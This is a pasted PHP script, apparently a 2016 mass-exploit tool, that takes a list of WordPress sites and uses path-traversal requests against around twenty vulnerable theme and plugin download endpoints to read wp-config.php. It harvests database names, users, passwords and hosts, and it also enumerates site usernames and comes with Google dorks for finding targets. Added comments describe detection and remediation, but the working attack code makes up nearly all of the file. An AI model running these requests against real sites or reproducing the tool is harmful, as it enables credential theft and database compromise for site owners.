D3vice

Exploits Wordpress LFD 2016

Feb 5th, 2016
  1. <html>
  2. <body>
  3. <pre><center>                  
  4.         <h2>Exploits Wordpress LFD </h2>
  5.             <p>Coded by D3vice </p>
  6.     <form method='POST'>
  7.     <textarea name='sites' cols='45' rows='15'></textarea>
  8.     _______________________________________________________________
  9.     <input type='submit' value='Exploit' /><br>
  10.     </form>
  11.  
  12.  
  13. <?php
  14.  
  15. # Coded by : D3vice
  16. # Exploits Wordpress LFD
  17.  
  18. /**
  19.  Dork Google: revslider.php "index of"
  20.  "wp-content/themes/construct/"
  21.  "wp-content/themes/persuasion"
  22.  "wp-content/themes/manbiz2"
  23.  "wp-content/themes/elegance"
  24.  "wp-content/themes/modular/"
  25.  "wp-content/themes/myriad/"
  26.  "wp-content/themes/echelon/"
  27.  "wp-content/themes/fusion/"
  28.  "wp-content/themes/awake/"
  29. **/
  30. # Review note (defensive reading): this script takes a list of base URLs from the form above and, for each one,
  31. # requests the theme/plugin download endpoints listed further down, asking each of them for wp-config.php.
  32. # NOTE(review): a copy found on a server you operate should be treated as a sign of compromise; it sends requests to whatever URLs are POSTed to it.
  33. @set_time_limit(0);
  34. # set_time_limit(0) lifts PHP's execution time limit; the leading @ suppresses the warning if the call is refused.
  35. # $_POST['sites'] is read with no isset() check and is split on "\r\n" only, one entry per line of the textarea.
  36. $sites = explode("\r\n", $_POST['sites']);
  37.  
  38. foreach($sites as $site) {
  39. # Fingerprinting step, run once per submitted entry: fetch the URL as given and look for a "WordPress <version>" string in the response.
  40. $site = trim($site);
  41. # Detection: the fixed User-Agent below and the /?author=1 request further down both appear in access logs; both are trivially changed, so treat them as weak indicators.
  42. $ch = curl_init();
  43. curl_setopt($ch, CURLOPT_URL, "$site");
  44. curl_setopt($ch, CURLOPT_HEADER, 1);
  45. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  46. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  47. $get = curl_exec($ch);
  48. curl_close($ch);
  49.     if(preg_match("#WordPress (.*?)/>#", $get, $version)){
  50.     $str = str_replace('/>', "", $version[0]);
  51.     $str = str_replace('"', "", $str);
  52.     # Author enumeration: /?author=1 is fetched and the text before the first '|' in <title> is reported as the user name. Mitigation: treat login names as non-secret and rely on strong passwords and MFA.
  53.     $users = @file_get_contents("$site/?author=1");
  54.     preg_match('/<title>(.*?)<\/title>/si',$users,$user);
  55.     $wpuser = explode('|',$user[1]);
  56. echo " <br>_______________________________________________________________</br>";
  57. echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>"; } # analyst caution: $site, the title text and the version string are echoed without htmlspecialchars(), so remote content is rendered as HTML
  58.    
    # Dork Google: revslider.php "index of"
   # inurl:wp-content/themes/antioch
   # inurl:wp-content/themes/authentic
  62.     # GET probes: each entry below is a theme/plugin download or image endpoint, requested without credentials, whose file/img/download parameter is given a path (most with ../) that resolves to wp-config.php.
  63. # Defender view: access-log requests to these paths with wp-config.php in the query string are the signature. Update or remove the listed components; if such a request returned the file, rotate the database password and the keys/salts in wp-config.php.
  64. $expl = array("wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php","wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php","wp-content/themes/urbancity/lib/scripts/download.php?file=wp-config.php","wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php","wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php","wp-content/force-download.php?file=../wp-config.php","wp-content/themes/lote27/download.php?download=../../../wp-config.php","wp-content/plugins/wp-custom-pages/wp-download.php?download=../../../wp-config.php");
  65. foreach($expl as $exploit){
  66. $ch = curl_init();
  67. curl_setopt($ch, CURLOPT_URL, "$site/$exploit");
  68. curl_setopt($ch, CURLOPT_HTTPGET, 1);
  69. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  70. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  71. $xp = curl_exec ($ch);
  72. curl_close($ch);
  73. if(preg_match("#DB_USER#i",$xp)){ # a response counts as a hit when its body contains DB_USER
  74. preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
  75. echo "DB_NAME:{$DB_NAME[1]}<br>";
  76. preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
  77. echo "DB_USER:{$DB_USER[1]}<br>";
  78. preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
  79. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  80. preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
  81. echo "DB_HOST:{$DB_HOST[1]}<br>";
  82. # the four values above are taken from the remote response and echoed unescaped
  83. }}
  84. # POST probes: the same wp-config.php read is attempted through lib/scripts/dl-skin.php in the listed themes, using the _mysite_download_skin form field.
  85. $lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php","wp-content/themes/dejavu/lib/scripts/dl-skin.php");
  86. foreach($lt as $l){
  87. $site = "$site/$l";
  88. $process = curl_init($site);
  89. curl_setopt($process, CURLOPT_TIMEOUT, 30);
  90. curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
  91. curl_setopt($process, CURLOPT_HEADER, TRUE);
  92. curl_setopt($process, CURLOPT_POST, 1);
  93. curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php"); # detection: the path travels in the POST body, which default access logs do not record; alert on any POST to a dl-skin.php path instead
  94. curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
  95. curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
  96. $return = curl_exec($process);
  97. if(preg_match("#DB_USER#i",$return)){ # same hit criterion as the GET probes: body contains DB_USER
  98. preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
  99. echo "DB_NAME:{$DB_NAME[1]}<br>";
  100. preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
  101. echo "DB_USER:{$DB_USER[1]}<br>";
  102. preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
  103. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  104. preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
  105. echo "DB_HOST:{$DB_HOST[1]}<br>";
  106. break;
  107. echo " <br>_______________________________________________________________</br>";
  108. # Remediation if a dl-skin.php request returned the file: remove or update the theme, then rotate the database password and the keys/salts in wp-config.php.
  109. }
  110. }
  111. }
  112.  
  113. ?>
  114. </html>
  115. </body>
  116. </pre></center>